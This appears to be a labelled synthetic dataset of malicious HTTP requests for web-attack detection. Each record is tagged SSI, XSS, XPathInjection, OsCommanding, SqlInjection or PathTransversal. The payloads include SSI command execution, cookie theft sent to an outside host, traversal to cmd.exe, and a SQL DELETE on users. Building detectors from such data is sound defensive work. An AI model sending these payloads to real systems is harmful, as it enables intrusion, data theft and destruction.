Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 84.135.253.198
X-Serial-Number: 802337450581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39318
Start - Id: 40102
class: SSI
GET /eoGZ5mmeNFor_/hboot.iniWS1DinYdZAg/MwaiS4dan9eiteq/ceTAqdovWO/iZHB7uv/rHacntknmsait.asp?osepm=hiO03t.&tahtdh=3&c8imrc=owrse&uecMmrx=zuv&rrebgwledb=%3ChOe%25t%25iltlpositionpasswdoidautoexec%40%3An&QD3354aEtFI=opdRc&mNe2lo=c%7E&7iep=DdfD&7bDhPa1=hcJxpW&2fmDtaassoqiwu=%3C%21--+++%23exec++++cmd%3D%22%2Fbin%2Fls+++++-l+++++%2Fhome%2FaresTta02%2Faves9evfwi%22+--%3E&ctcihapndSqn=e%25ahretossigroup+bynnn&txfeasn=eleoerpI5sn HTTP/1.1
Host: 36.169.224.128
Connection: tenhfci
Accept: image/*;q=0.7, video/quicktime;q=0.3, image/jpeg
Accept-Charset: utf-7, windows-1258;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 113.207.135.168
Cookie: Omir=22698
Cookie2: $Version="25"
Date: Thu, 16 Jul 09 22:50:42 GMT
ETag: "TiA@-@BOj-dF88jDdY-F"
Expect: smk9rHu
From: wapns@pecdn.de
If-Modified-Since: Tue, 08 Jun 04 18:07:37 UTC
If-Unmodified-Since: Fri, 23 May 08 22:59:36 GMT
If-Match: *
If-None-Match: *
If-Range: "YSlp-R3rBSXZ2bPVpIM"
Max-Forwards: 6
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://hOaez.ch/vyle/adcoet/ecied4i/lmeje/fyuT.htm
Authorization: Basic czBMcnNhOmhwdEI=
Range: 12545-4
Referer: /nehe/wreq/t6ta/h5nnhi.mp3
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.5 (Windows; U; Win 9x 7.2; se-tI; rv:7.6.0) Gecko/91878881
UA-CPU: 68000
UA-Disp: 952,4343,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 192x9251
Via: lrXw/8.3 254.180.29.129
Transfer-Encoding: compress
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 579 74.104.76.46 "raice5uopltesn" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 606454137105
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40102
Start - Id: 46551
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.1
Host: 194.153.46.240
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: tmt-e;q=0.6, n7jfeena-lsnneen, Z-thpd;q=0.3
Cache-Control: max-stale
Client-ip: 249.247.50.249
Cookie: lsdBHIvY49n.=7Z.H;Ux1evalT8=u/;Ise=0c7;rot=+h6;anela=ostyle/ suinsert6execenbat;ew=e@aL\ts80d4dii0e
Cookie2: $Version="88"
Date: Sat, 12 May 07 04:08:57 UTC
ETag: W/"9D841MOe5gpWEsHJk"
Expect: atpSh=pnachAn
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 02 Sep 07 10:24:22 GMT
If-Unmodified-Since: Thu, 20 Dec 07 01:04:06 GMT
If-Match: "xIRzK16jp7t-YVqterIT"
If-None-Match: *
If-Range: "G5XeIP9.NzCAKmQn4zM"
Max-Forwards: 7049
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest username="rgww0see"
Authorization: Basic eW50c2k6ZXBsYWFl
Range: 2794-2,-4107
Referer: /eabab/seEsrSvo.jsp
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/1.6 (Machintosh; U; PPC Mac OS X 3.5; sr-ed; rv:0.4.8) Gecko/01502700
UA-CPU: 68000
UA-Disp: 884,253,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 139x000
Via: 3.0 www.uoxet0.js:4728, 9.8 143.28.202.87
Transfer-Encoding: gzip
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 966 www.wbotv.jpg:25 "aathTEriueny3oP" "Sun, 13 Mar 05 23:13:21 UTC"
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 907134703793407479
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46551
Start - Id: 49175
class: XPathInjection
GET /rGee/hboot.iniShPmMZvZx/DraIswecdeetnOsicldn/cnkrn6uqp/2c/hht/tmt6ao/aKHUqU4Q.shtml?pqartedsc=19&ctus6tbeohtrUr=cCUoet&cn=8291&airc=nosfig%27%5D+%7C++P++%7C++%2F%2Fuser%5B+name%2Ftext%28%29%3D++%27h0 HTTP/1.0
Host: 62.220.209.21:9921
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-age=65
Client-ip: 222.14.181.160
Cookie: mfihztew9l0seIj=9
Cookie2: $Version="703"
Date: Mon, 16 Feb 04 02:36:41 CET
ETag: "mOIFkg9nVCC_XPd"
Expect: 100-continue
From: sbgdd@uletat2q.net
If-Modified-Since: Mon, 14 Sep 09 01:55:41 CET
If-Unmodified-Since: Sun, 16 Nov 08 08:04:31 GMT
If-Match: *
If-None-Match: "st4x0Mea.kYgi2.46"
If-Range: *
Max-Forwards: 41
MIME-Version: 2.4
Pragma: hesedht=eire
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Basic NGk2ZWVsOnJhcm1sSGM=
Range: -695984
Referer: /qsor6t2.avi
TE: gzip;q=0.4,trailers,trailers
Trailer: Host
User-Agent: Mozilla/6.2 (Machintosh; U; Mac OS X 9.7; qa-Tt; rv:6.1.7) Gecko/19256187
UA-CPU: x86
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 290x3654
Via: FTP/1.8 18.2.78.251:315
Transfer-Encoding: identity
Upgrade: q8iste/1.0, ici/0.5, qtyr3/1.9, oea/6.5, h1e5st/7.2
Warning: 382 78.125.64.215 "ptlueeneohddxrty" "Fri, 18 Jul 08 15:26:47 UTC"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 6850092
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 49175
Start - Id: 46476
class: XSS
GET /<script>alert('Vulnerable')</script>.jsp? HTTP/1.1
Host: www.aLcn.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 98.141.212.240
Cookie: pncspr=:a;anmailautoexecnull3GX=asdeeaopEstmd4bu
Cookie2: $Version="2"
Date: Thu, 26 Feb 04 23:37:16 GMT
ETag: "TClpSRyVRpjXpah"
Expect: 100-continue
From: oeed@ro5sY.uk
If-Modified-Since: Fri, 21 Sep 07 01:21:45 GMT
If-Unmodified-Since: Sat, 08 Sep 07 15:48:17 GMT
If-Match: *
If-None-Match: *
If-Range: "EHImig7PXy59Qtju"
Max-Forwards: 474
Pragma: tnlL9='2xrctxds'
Proxy-Authorization: NTLM NmlrZHBhbnJlc3cwbGVBc292aWF1YXNtcmk4YWlkc2ZsZHV4YXJwM2t1bWNI
Authorization: iserFt i8zmg=rspfnme
Range: -540
Referer: /hi32/yfrscn.mdb
TE: deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: Mozilla/9.8 (X11; U; Open BSD i386 4.3; 9o-ae; rv:3.0.3) Gecko/05308426
UA-Disp: 5862,1372,32
UA-OS: Linux
UA-Pixels: 139x000
Via: 9.7 www.etpbcee.html
Transfer-Encoding: deflate
Upgrade: fyos/6.8, iroag/5.4, 3rX/2.7, eCy/4.0, vUar/8.3
Warning: 938 www.atHFrEd.css:45 "szdtn5eo4is" "Sat, 06 Dec 08 18:20:14 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46476
Start - Id: 35660
class: XPathInjection
GET /to-AY2PJ2T/85jJmeta@@jljdtfI/sbfmAEeBE3D/9jFxrmR@/ir/iK.sop2h2idEyE.N/WH/760Y..sLwo1v/s7cY7PndS3VRuEPOPJ/iaon6eesua2minaaNoit/6ei5coag.htm?0Ech=h_6E&hNmtaHhir=sF5v4aoWhUpz&ozipdcgiaTnj1eO=%28r+tt&t6te4thaC=04839&ddyiiSnd=39834592&0Sjbk6=0iaadD9Anpc5m&ebY1pnOiB=2+++++or++++ltal%2FguRi%2FeecA%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D796%5D+++++or+++578%3D&23Ppen9eE=e0HCQlKXpSJB&onrhaitetehLp=sn&irrtGloetz=jfTeoE3vtr&2oewfhqeyHT8m=o1nmh&rh=9anftpeoK%7E%25&i1su2aNbebr=68726&ept6rl=snftizh4E HTTP/1.1
Host: www.NeuleracNn.gov
Connection: close
Accept: image/png;q=0.6, text/plain;q=0.5, video/*
Accept-Charset: euc-cn
Accept-Encoding: identity, identity, gzip;q=0.2
Accept-Language: *
Cache-Control: min-fresh=8424
Client-ip: 157.230.2.181
Cookie: jewerdcKyy=u8 2aqf6Jy&=s
Cookie2: $Version="90"
Date: Mon, 07 Feb 05 08:57:59 UTC
ETag: "UDJxFP191jf5i2WY"
Expect: v5nny3s=veaajmir
From: njsh@NrDrfrcud.com
If-Modified-Since: Mon, 23 Nov 09 12:00:13 GMT
If-Unmodified-Since: Sun, 14 Oct 07 12:51:23 CET
If-Match: "tc@@Xu5z7qP75pd"
If-None-Match: "aksz6pGr7ZDHKs.y5B"
If-Range: *
Max-Forwards: 75
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: tvqbts otO9e=Oh7KonRe
Authorization: Basic Y2E2b1c3OnR6ZG1Eb210
Range: -5103
Referer: /tdin1fao/Mode/2eJdma3/ttkrz.fgf
TE: chunked;q=0.4,chunked,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.7 (compatible; MSIE 3.0; Unix; 1tduii)
UA-CPU: MIPS
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8105x4373
Via: 0.3 www.syoOs.html
Transfer-Encoding: deflate
Upgrade: alcth4/9.0, omen/8.5
Warning: 673 36.123.188.80 "hcrIRotv8tetpAwee" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 24734
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35660
Start - Id: 39699
class: SSI
GET /sxSXnzez9a.gif?tenhtoc8be=3Omh08%3EMs&teih=aefEss&arrlJsnEkwnfee=2452860&unoatSercanr=%3C%21--+++%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&_OT2i=crvrrubbtchd%7C&qrQZ=njl&pn1v2o9stn6jywo=dMJ&SlEhPxHR-UE=ig%3EalxAhhaIi%28n&mukei0dye5y=rseheereo3et&ma6BI=gsamUyirm&nyxueveel92Ftgh=-%3Fewget&otigol3Mdif6iv=6&wrrapash8Hsi=%25aZcatd&AelNh=Ljrxscnoeet&EEiL53telnetYYmailD=eOA.9Ox1DH HTTP/1.0
Host: 236.216.3.196:0898
Connection: c3nedyka
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: identity, deflate, deflate, gzip;q=0.4, gzip
Accept-Language: xa69-z;q=0.2, nt-emfsAirn, zcc-nprstty;q=0.7
Cache-Control: no-cache
Client-ip: 120.48.93.141
Cookie: 8form5n3=1074;havingZvstyleL6@f=8nvfireyrema
Cookie2: $Version="4"
Date: Sun, 18 Sep 05 20:46:04 CET
ETag: W/"xkPYfz.4VPY.xSX"
Expect: 100-continue
From: ekb7rls@onnByehnb.gov
If-Modified-Since: Fri, 23 Apr 10 09:32:35 UTC
If-Unmodified-Since: Fri, 30 Nov 07 02:59:55 CET
If-Match: *
If-None-Match: "ifkvyy._zcgNj3c"
If-Range: Sun, 20 Aug 06 02:45:23 UTC
Max-Forwards: 770
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: Basic cm5mYWVPYW86bmdlbA==
Range: 557783-681,980106-
Referer: http://www.eutoqlti.de/seSLq/irxntr/apvnEoAo/tY7oBtD/eaeTGsUs.shtml
TE: gzip;q=0.7,deflate;q=0.3
Trailer: If-Match
User-Agent: iHpr (mDUK9ztyQm; eFc6fFPNR)
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 726x074
Via: 3.7 112.42.80.76:6
Transfer-Encoding: compress
Upgrade: im0/0.0, gln/3.7
Warning: 081 www.8wna8.jpg:64 "othhe5UTHRpeH" "Tue, 13 Jun 06 09:06:37 CET"
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39699
Start - Id: 43825
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.qiaf.biz
Connection: keep-alive
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: E6a=Uhm
Client-ip: 110.26.184.172
Cookie: xduaf=9st3;SvmolwriontHc=<e ;toroEmhfewRc=Ms+iwhoekdg
Cookie2: $Version="87"
Date: Fri, 15 Apr 05 06:48:19 CET
ETag: W/"-MJfZJF0gHAQgRUgxoJi"
Expect: 100-continue
From: nNdc@ioesest.fr
If-Modified-Since: Fri, 09 Jul 04 02:07:55 UTC
If-Unmodified-Since: Fri, 14 Nov 08 23:23:36 GMT
If-Match: "NK3rOA-0JT6ThHP4"
If-None-Match: "7s7SRKbQkuCuL9ogF_P."
If-Range: Fri, 06 Apr 07 03:37:59 GMT
Max-Forwards: 477
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: Basic YW54ZWlqOnhic3M=
Range: 7246-,-7950
Referer: http://www.ynsmt5r.com/t4ic/uB9eFoeu/oceauidn.pl
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/4.5 (compatible; MSIE 0.9; WinNT; ee8ebwsn; konwIYd; ehoat)
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6925x167
Via: 7.3 www.eohnR.tiff, 5.2 88.65.214.58
Transfer-Encoding: compress
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 179501201
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43825
Start - Id: 48924
class: XPathInjection
GET /9nEr/dEOXiS.styleYoH/wde0wmszcjg2/-_YP.CIVA/btelbrirdox2m/rfantPt52BeIwtwawao/ydsoCeb8eq6isnst/ebrndnilh2iieeners/uZlPEWmAu6kaBnJYVi/Gybj7replace-m/maNk.msf?shn=sge%2Fi%2FaO%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D990%5D+++++%7C+++im%2Ft%2FTbee%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D4%5D++++or+++++%27srtwbzrn%27%3D+++%27&serpjdelC=%3Dsne&oiqass=%25e1b%25nn%3Ddivbq%26&ar8idctiamcle=htfhonsramdo2Ioni&neeaieixn3=55&sxSma=gtrauESksksh9kNse&qmFei7qBTmocha_o=inUKc99Nd&otSQzQB0hA7=roh+wwlnbortemi%7Cn%3Fdb&ayaEfd86it=76459 HTTP/1.1
Host: www.rEjsdha.ch
Connection: Odt74t
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: m-m;q=0.4
Cache-Control: only-if-cached
Client-ip: 187.187.151.241
Cookie: N1n@Ve=6482081;tf5wd=ouwsvo
Cookie2: $Version="7"
Date: Thu, 11 Nov 04 19:29:02 UTC
ETag: W/"Rgf_hh80cxySShP0crvb"
Expect: 100-continue
From: adatne4h@font.be
If-Modified-Since: Tue, 25 Jan 05 05:11:28 CET
If-Unmodified-Since: Mon, 17 Nov 08 12:39:03 UTC
If-Match: *
If-None-Match: "AtDXj-Bjn46i1RJyMG"
If-Range: Wed, 24 May 06 02:18:18 UTC
Max-Forwards: 8
MIME-Version: 7.0
Pragma: egtel='awitr'
Proxy-Authorization: NTLM bmx2cmlpZmV0Ym1zdGg5b2xpYWRucmN2dGM4aTNlbm1lRVVoYg==
Authorization: a1piir ioAaEfh=ckslot
Range: 1264-
Referer: /5leMo/0esnt/tujgI.tiff
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Host
User-Agent: Mozilla/5.2 (X11; U; Solaris 8.2; tI-oo; rv:4.0.0) Gecko/54244207
UA-CPU: PowerPC
UA-Disp: 9230,4281,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 508x349
Via: 0.5 www.eiWt9ls.css:1, 6.0 www.aset.css:7, FTP/3.4 135.56.67.62
Transfer-Encoding: deflate
Upgrade: nh8h/9.9, eweeTf/0.2
Warning: 800 139.238.82.6 "oepmrjghlc" 
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 4208976972
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48924
Start - Id: 47366
class: XSS
GET /Dm3uioo/hbX5o3n0xviiEysq/hJbIPyefEfv/Pj89otkeauigEawo2e/f2CTicoumyeEPsbheaty/iNNAtrhIbs/childr7/sZNQ_bj/eE9zBmM89N5X/btiesl8f2usyn/4XIUJ8QdIm3.jpeg?updategw4GneX@1L=phpov&deka2wAtR=d0sol&1gxdkscxSye=14586378&roIntoposlai7=%3Cimg+++src+%3D++%22++++livescript%3A%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.sietroto.com%2Fcgi-bin%2Frearstesst.cgi%27%2Bdocument.cookie%29%3B%5D+++%22++%3E&eapsbndca=7259384241&eN2q=HmbyTwdeltTre&8lefttneUAs1=i-EEiXh&r7ladaargftea=allYstqg6OlLzt1sh&adc4rarid5s=0mAees4u%2Faccess_log&eeorfrptt8pn=ileai&raceeenwex=aSl_xSr-L%40&ccb9f=41266697&D9u8H=ebrbtlh HTTP/1.1
Host: 231.3.51.40
Connection: close
Accept: text/html
Accept-Charset: koi8;q=0.5, euc-kr, iso-10646-ucs-2
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 118.97.198.10
Cookie: edmg3o=yKdY9j-diP;e3px4ln=ac;Oaweih=oq1qe;lSeI6oi=sDi;ooeantjsqef= %and
Cookie2: $Version="004"
Date: Thu, 11 Nov 04 11:28:54 GMT
ETag: W/"PjYKmUAHLLYd8gcE5"
Expect: 100-continue
From: Rlpr@aeautrol.org
If-Modified-Since: Fri, 22 Feb 08 07:45:28 CET
If-Unmodified-Since: Tue, 19 Jun 07 05:35:27 CET
If-Match: "bolaVc@GADCm-kwZJ"
If-None-Match: *
If-Range: Tue, 01 Jun 04 01:46:41 GMT
Max-Forwards: 78
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: e3ns peuba=sntTat
Range: -773710,2145-890
Referer: http://www.eeyw.fr/aSoa9sht/ncaecgl/e9et/cpyicE/linaz.js
TE: trailers,trailers
Trailer: Trailer
User-Agent: ninliT (dS-31LA8; jnMKVsJ; e4.VzYDD)
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 605x5902
Via: 4.8 www.Ghtunnms.gif, 5.4 www.u9EA.html, FTP/2.9 www.TTasas.js
Transfer-Encoding: srSoe; iOhim=atq4
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 970 233.253.83.48 "nctm" "Thu, 06 Nov 08 08:21:23 GMT"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 0450626600564347
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47366
Start - Id: 39676
class: SSI
GET /tat5roegT/ee3wuDf9R5wd/baa0atvo0xnegeBrs/IGgUNKtelneth/m9Kip_@jEF/FsamagRcFVtmpoN3/aPSQ1CB52r/hmNYyewHZ3471tWz/rorGI4AnIDX.nsf?senetnnied=nr1UN11tTV&ZFMUUxB=%3C%21--++%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22--%3E&n5eeaSx=t+&apezeoei4f=twinnt&GiTDy=224&ibb=%2FL&rwudyotlyflhi=ea6&aErllecae9dtvea=srk HTTP/1.1
Host: 43.155.65.4
Connection: close
Accept: application/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=9144
Client-ip: 17.56.25.243
Cookie: aoodqrhaTs=6384
Cookie2: $Version="57"
Date: Sat, 02 Apr 05 15:49:00 UTC
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: odEootep@ltmngy.biz
If-Modified-Since: Sat, 23 Dec 06 07:02:01 UTC
If-Unmodified-Since: Thu, 22 Apr 10 08:58:38 GMT
If-Match: *
If-None-Match: "lR-A7X_--x_5AiH"
If-Range: "xK1saFgGulzrQ2lzG4D4"
Max-Forwards: 7
MIME-Version: 9.9
Pragma: ettdi=ter
Proxy-Authorization: NTLM eGVkdGNhbzJhc2l3dHBjcGF0cndpcmMxdHNldGx1ZTBxZXRSbHVl
Authorization: Digest nc=bfF4DAEf
Range: 047-,52-2392,30343-939979
Referer: /7trs/yerHee/bzEcd9/ttnn.nsf
TE: chunked;q=0.7,chunked;q=0.4
Trailer: If-Range
User-Agent: hicTnoillDqaut
UA-CPU: 68000
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: HTTP/6.5 www.eehma.html:0137, enr/2.5 www.ojn7cmy.htm
Transfer-Encoding: identity
Upgrade: oos/3.5, rts/5.9, ns9lh/5.9, csOEa/6.4, tncn/0.3
Warning: 733 214.19.169.247 "I5ohianit" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39676
Start - Id: 41527
class: SqlInjection
PUT /FYN/bYDozQkIZ.Y.dll? HTTP/1.1
Content-Length: 294
Content-Language: beOp6d5r,wrbt7,dI0t83te
Content-Encoding: identity
Content-Location: http://www.sles.fr/eetr3.msf
Content-MD5: dGFlYW4yNGdpMXdtckpvaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 Feb 08 22:30:42 CET
Last-Modified: Fri, 04 Jun 04 19:23:35 UTC
Host: 99.41.78.198
Connection: ibh1fe
Accept: application/rtf, audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: or=9b2tepyt
Client-ip: 17.229.40.102
Cookie: pmopEeeabeA=i+ eer; [;o7eoior2=idtodilweEsOwT;samyFqeM=kitsn;i8eaniRaE=90;sSqHL.RB=sewget9rconnectoprocessing-instruction;scn1mOn5u=v tseS
Cookie2: $Version="76"
Date: Mon, 25 Apr 05 03:54:34 GMT
ETag: "jn7AlyPuFHWKaEg"
Expect: maEbbf
From: tdvdi@oee6.st
If-Modified-Since: Thu, 25 Mar 04 15:25:54 GMT
If-Unmodified-Since: Mon, 16 Oct 06 24:53:42 UTC
If-Match: "DYUrs8Juq4sgn3LTn"
If-None-Match: *
If-Range: Tue, 05 Aug 08 07:18:56 UTC
Max-Forwards: 528
MIME-Version: 0.0
Pragma: flsssyA='Mmayeipa'
Proxy-Authorization: NTLM dEU5ZGE5bXRvc1NwYVNlZXlueGFwM3RqdHRuZkJkYWRmYWI0
Authorization: NTLM aXJ5OGV2b2Vvb3JzeWlvdGFpNXJtbkVpbnM3ZUV0bGRsd29jc2RpZWF0
Range: 911566-290,4666-98
Referer: http://www.semmaaev.st/nece.nsf
TE: trailers,deflate;q=0.6,trailers
Trailer: User-Agent
User-Agent: seimsesbiCoiiint
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: hxcmla/9.5 www.gisv.js, 9.8 207.0.249.91:998
Transfer-Encoding: deflate
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

Hth9eoIliV=ribdfldel&imieao=186108&vNxrenzn=;hUeal&SE1nIMKcRr=&ow;afgtaxTlidt&nhd6tcw23euhdo=seN8zV@8wQ5&raE=2xylr7gadhrklere&iey=651&t4enpuerpuasz=kniao1n'    );    DELETE   FROM  users   WHERE upper(username)   =  upper( 'admin&Ng=copyeorYk&0dnppeidmtsi=s~fok98amgsn

End - Id: 41527
Start - Id: 46447
class: PathTransversal
POST /swez/dheNttosatarseo3nr/iltaeARdl/l2kaum-4Ia2F/o214FRAL6TlQaU6eB4/NUc.shtml? HTTP/1.1
Content-Length: 202
Content-Language: tlo
Content-Encoding: gzip
Content-Location: http://yor3i.org/rbtah1/intt/i2cpnohp/udwai/9clargyi.php4
Content-Type: application/x-www-form-urlencoded
Host: 107.74.217.172
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.8
Date: Tue, 22 Nov 05 17:24:16 GMT
If-Modified-Since: Fri, 04 Dec 09 03:16:41 CET
If-Range: Tue, 14 Aug 07 24:18:56 GMT
Max-Forwards: 1
Pragma: Etmad='Dno0usf'
Referer: /k5sscm/penaw.png
User-Agent: /etc/httpd/httpd.conf
Via: g3fw/5.2 42.41.249.50
Transfer-Encoding: compress
Warning: 366 19.233.23.68 "coaane7frldtiZnt" "Sat, 02 Sep 06 08:52:19 CET"
X-Forwarded-For: 104.169.34.184

deqAza8cph=gp&oQvVjc=0U@UD&hcnc1szutqosedG=ih<&1O=ivpositioneehpses&bwnunnsmheN=tht&k1ret=fO8M94&0nrGxsprkt=997780999&fwRllivhhdcvi=um h'Araah&JNQUshutdown=113&oim=sSeaiw&yoho=fPs&sierhra=oersioe9

End - Id: 46447
Start - Id: 40441
class: SSI
GET /79viTl/s_7EdaaE0SN/d_lct79wnt_Vz.cgi?tesluctwhminate=csn&dbd5s4hpl6s=6916707&aehnztibal=s+a-8tistdin&sKgaeIAeIbz=%3C%21--++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&Osuefhsuner=2o&zIYsaeedeee=tOdieIg&0iinNV-=aho3erelqptcum32a HTTP/1.1
Host: www.rpoiwa.uk:80
Connection: close
Accept: image/gif, text/*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 160.80.33.186
Cookie: rsxte0sE=s;KPfnN4R-having=libprocessing-instruction@e6heBl;d4TinhCplasuxo=eev  servicesr
Date: Thu, 27 Dec 07 21:46:11 UTC
ETag: W/"bavlZxsTQd_F3A4Suj"
Expect: 100-continue
If-Unmodified-Since: Wed, 15 Nov 06 03:21:44 GMT
If-None-Match: "@EO4WXr6dVVvBAVQgOF"
If-Range: "dRvIvZRddlTCwMD7U"
Max-Forwards: 2775
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: rwn3u idctraIi=sRc7
Range: 53605-7014
Referer: /sE0Miptn.php3
TE: deflate,deflate;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: ena8aer/2.5.6.0
UA-CPU: x86
Via: 4.9 22.216.177.129, 5.6 www.xntot.shtml, 8.8 www.bbsd.jpeg
Transfer-Encoding: compress
Warning: 424 www.ivstiAcN.shtml "Koasse" 
X-Forwarded-For: 211.36.21.124

null

End - Id: 40441
Start - Id: 45006
class: PathTransversal
GET /laORopavu/b8i/Ce9hwa.jsp?esetli=4895&UxJmWc=7758&CQ9gkwWo9jSn=995&otu=scriptqa0&reattinmonn2=doc%28+file%3A%2F%2F%2Fc%3A%2FdA9%2F7sNcoo.xml++%29&ebk=916238&r2GdnazsunB=93&dmMhtenoooidw=oZRFr&p0AYD=tC67g&2sh7iurnauertua=257&g7=Mea%27t5copy+ecoulr&dlAT5npait=1380&en=3270153&aeenaekv=surn HTTP/1.1
Host: www.ooNEdrwo.gov
Connection: close
Accept: image/png;q=0.1, image/jpeg;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: rdatel-R;q=0.9, wfront-a, s0-5roeirn;q=0.6, rmi3-tqev, thsTtnje-sge
Cache-Control: only-if-cached
Client-ip: 112.221.77.108
Cookie: 6b6S48GO=bGQ
Cookie2: $Version="51"
Date: Sun, 03 Dec 06 16:59:34 CET
ETag: "06Aqq7j6Gd0C_dK"
Expect: 100-continue
From: Wmt1aod@ntoq7.ch
If-Modified-Since: Sun, 11 Oct 09 11:25:31 CET
If-Unmodified-Since: Tue, 13 Jul 04 20:29:08 CET
If-Match: "eDVNkzkH44uvIrh7SnN"
If-None-Match: "oRfbweH_7ShF7_Dy@R-X"
If-Range: "FzYKzj_X7HEONkjN0K3p"
